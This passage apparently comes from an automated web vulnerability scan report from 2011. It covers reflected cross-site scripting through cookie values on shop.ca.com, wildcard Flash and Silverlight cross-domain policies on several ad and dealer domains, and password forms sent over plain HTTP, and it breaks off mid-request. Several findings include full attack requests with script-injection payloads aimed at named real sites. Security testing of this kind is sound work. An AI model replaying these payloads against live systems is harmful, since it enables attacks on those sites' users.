Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utma :36441954.679833155.1303044886.1303044886.1303044886.13c513--><script>alert(1)</script>9351f2fd952-->
...[SNIP]...

4.324. http://shop.ca.com/cgi-bin/order.asp [__utmb cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the __utmb cookie is copied into an HTML comment. The payload 51af8--><script>alert(1)</script>a2ecb59f772 was submitted in the __utmb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.130304488651af8--><script>alert(1)</script>a2ecb59f772; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:52 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:53 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmb :36441954.3.10.130304488651af8--><script>alert(1)</script>a2ecb59f772-->
...[SNIP]...

4.325. http://shop.ca.com/cgi-bin/order.asp [__utmc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the __utmc cookie is copied into an HTML comment. The payload 53f6b--><script>alert(1)</script>ab4bcb782ce was submitted in the __utmc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=3644195453f6b--><script>alert(1)</script>ab4bcb782ce; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Length: 16117
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:50 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:51 GMT
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmc :3644195453f6b--><script>alert(1)</script>ab4bcb782ce-->
...[SNIP]...

4.326. http://shop.ca.com/cgi-bin/order.asp [__utmz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the __utmz cookie is copied into an HTML comment. The payload 24b21--><script>alert(1)</script>4c24d71b7ea was submitted in the __utmz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)24b21--><script>alert(1)</script>4c24d71b7ea; Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:42 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:43 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmz(36441954.1303:(direct)|utmccn=(direct)|utmcmd=(none)24b21--><script>alert(1)</script>4c24d71b7ea-->
...[SNIP]...

4.327. http://shop.ca.com/cgi-bin/order.asp [_clogin cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the _clogin cookie is copied into an HTML comment. The payload 88fd3--><script>alert(1)</script>2233c94e72c was submitted in the _clogin cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=130304693945288fd3--><script>alert(1)</script>2233c94e72c;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Length: 16117
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:54 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:54 GMT
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--_clogin(e) :130304693945288fd3--><script>alert(1)</script>2233c94e72c-->
...[SNIP]...

5. Flash cross-domain policy
There are 8 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.



5.1. http://cspix.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sun, 17 Apr 2011 12:53:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.2. http://images.dealer.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://images.dealer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: images.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/v8/widgets/generic/image/simple-slideshow.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "76a2eb098d44109bdef2ab5edf582864:1261669901"
Last-Modified: Tue, 14 Oct 2008 20:09:16 GMT
Accept-Ranges: bytes
Content-Length: 77
Content-Type: application/xml
Date: Sat, 16 Apr 2011 17:02:40 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.3. http://pictures.dealer.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pictures.dealer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: pictures.dealer.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/v8/widgets/generic/image/simple-slideshow.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "60d031d9d008574354df1367044279d0:1287596521"
Last-Modified: Wed, 12 May 2010 23:31:20 GMT
Accept-Ranges: bytes
Content-Length: 102
Content-Type: application/xml
Cache-Control: max-age=1209600
Expires: Sat, 30 Apr 2011 17:02:26 GMT
Date: Sat, 16 Apr 2011 17:02:26 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.4. http://pixel.33across.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012359000"
Last-Modified: Fri, 18 Feb 2011 06:59:19 GMT
Content-Type: application/xml
Content-Length: 211
Date: Sun, 17 Apr 2011 12:53:49 GMT
Connection: close
Server: 33XG3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

5.5. http://static.dealer.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.dealer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: static.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/v8/widgets/generic/image/simple-slideshow.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6884e23ae3878559e2462c52da253db7:1281542303"
Last-Modified: Wed, 11 Aug 2010 14:54:07 GMT
Accept-Ranges: bytes
Content-Length: 251
Content-Type: application/xml
Cache-Control: max-age=1209600
Expires: Sat, 30 Apr 2011 17:02:40 GMT
Date: Sat, 16 Apr 2011 17:02:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

5.6. http://videos.dealer.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://videos.dealer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: videos.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/apps/video/player/ddcVideoPlayer_np.swf?ver=1.9.7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.3.10.1303002182

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "1612f281e8f7faf52d90c924e443e0bf:1211468597"
Last-Modified: Thu, 22 May 2008 15:03:17 GMT
Accept-Ranges: bytes
Content-Length: 103
Content-Type: application/xml
Date: Sun, 17 Apr 2011 01:02:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.7. http://videos2.dealer.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://videos2.dealer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: videos2.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/apps/video/player/ddcVideoPlayer_np.swf?ver=1.9.7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.3.10.1303002182

Response

HTTP/1.0 200 OK
x-amz-id-2: 6ibBp3OXutDZVObQcSErAxRd8VNdN2Ms7eHYQPymDw8NsMfUM2oJI1HayTfJ50Kj
x-amz-request-id: FEAE1E500B76B0B5
Date: Fri, 15 Apr 2011 00:12:58 GMT
x-amz-meta-bucketexplorer-md5: 3c308d6f3e4fe1b315814c0459693aee
x-amz-meta-bucketexplorer-sha1: 093cabd2351702b7ff3490b68d3894b0c2a8dd63
x-amz-meta-md5-hash: 3c308d6f3e4fe1b315814c0459693aee
Last-Modified: Wed, 13 May 2009 02:27:51 GMT
ETag: "3c308d6f3e4fe1b315814c0459693aee"
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 117
Server: AmazonS3
Age: 9618
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: a0418eade1661571d0b98ad587d10cb7c43dde15dd7400f55e62bf935c90d8ee90b958a46d00a123
Via: 1.0 35b60fc94656c4665da42ef6273cad71.cloudfront.net:11180 (CloudFront), 1.0 ae2f2d029ed3124a84cfa9aa7ac4668b.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.8. http://mt0.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mt0.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mt0.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Thu, 29 Apr 2010 17:44:34 GMT
Date: Sun, 17 Apr 2011 01:19:13 GMT
Expires: Sun, 17 Apr 2011 01:19:13 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
<allow-access-from domain="*.corp.google.com"/>
<allow-access-from domain="*.borg.google.com"/>
...[SNIP]...

6. Silverlight cross-domain policy

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012459000"
Last-Modified: Fri, 18 Feb 2011 07:00:59 GMT
Content-Type: application/xml
Content-Length: 335
Date: Sun, 17 Apr 2011 12:53:49 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

7. Cleartext submission of password
There are 70 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.


7.1. http://community.martindale.com/groups/groupdirectory.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.martindale.com
Path:   /groups/groupdirectory.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://community.martindale.com/groups/groupdirectory.aspx. The form contains the following password field: ctl00$fragment_37ecd1f6_d000_453d_b75e_a35fead33cbf$ctl00$txtFlyOutPassword

Request

GET /groups/groupdirectory.aspx HTTP/1.1
Host: community.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:57:23 GMT
Server: community.martindale.com 999 10.172.89.167:26020
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Telligent-Evolution: 5.0.40623.6204
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 16 Apr 2011 09:57:23 GMT; expires=Sun, 15-Apr-2012 13:57:23 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 16 Apr 2011 09:57:23 GMT; expires=Sun, 15-Apr-2012 13:57:23 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fbe2iivl3051vw55pumhla45; path=/; HttpOnly
Set-Cookie: CSExtendedAnalytics=6a585129-8677-4e91-b2ab-7ec120f5aac9; expires=Tue, 16-Oct-2012 13:57:23 GMT; path=/
Set-Cookie: CSExtendedAnalyticsSession=2828cdbb-ee29-4987-90c0-f64dc6fcf365; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 105287
Connection: close
X-RE-Ref: 1 -1984691478
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<div align="center">
<form name="aspnetForm" method="post" action="/groups/groupdirectory.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl00$fragment_37ecd1f6_d000_453d_b75e_a35fead33cbf$ctl00$txtFlyOutPassword" type="password" maxlength="20" id="ctl00_fragment_37ecd1f6_d000_453d_b75e_a35fead33cbf_ctl00_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.2. http://community.martindale.com/upgrade-your-connected-account.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.martindale.com
Path:   /upgrade-your-connected-account.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://community.martindale.com/upgrade-your-connected-account.aspx. The form contains the following password field: ctl00$fragment_d98c0d41_7b1e_4073_b418_3403d8759dfa$ctl00$txtFlyOutPassword

Request

GET /upgrade-your-connected-account.aspx HTTP/1.1
